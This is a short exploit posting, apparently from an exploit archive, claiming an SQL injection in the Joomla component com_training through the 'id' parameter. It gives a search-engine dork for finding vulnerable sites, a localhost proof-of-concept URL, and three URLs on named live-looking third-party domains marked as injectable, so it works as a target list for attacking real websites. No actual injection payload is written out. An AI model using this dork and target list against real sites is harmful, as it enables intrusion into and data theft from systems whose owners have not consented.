============================================================================
# Exploit Title: Joomla com_training SQL Injection Vulnerability
# Date: 10-05-2018
# Exploit Author: j!h4dDZ
# Tested on: Windows 7
============================================================================
1)---------- Search target with bing Dorking-----------------------------
index.php?option=com_training&task=show&id=
---------------------------------------------------------------------------
2)--------------------Exploit the websites---------------------------------
-----------------------SQL Injection-----------------------------------------
(PoC)
http://localhost/index.php?option=com_training&task=show&id=3094 SQL Injection
----------------------------------------------------------------
http://aebb.fptic-consulting.com/index.php?option=com_training&task=show&id=1084 Injection
http://www.fptic.com/index.php?option=com_training&task=show&id=159 Injection
http://cofinanciado.fptic.com/index.php?option=com_training&task=show&id=309 Injection
------------------------------------------------------------------------------
cxsecurity.exploitalert .EXPLIO.DB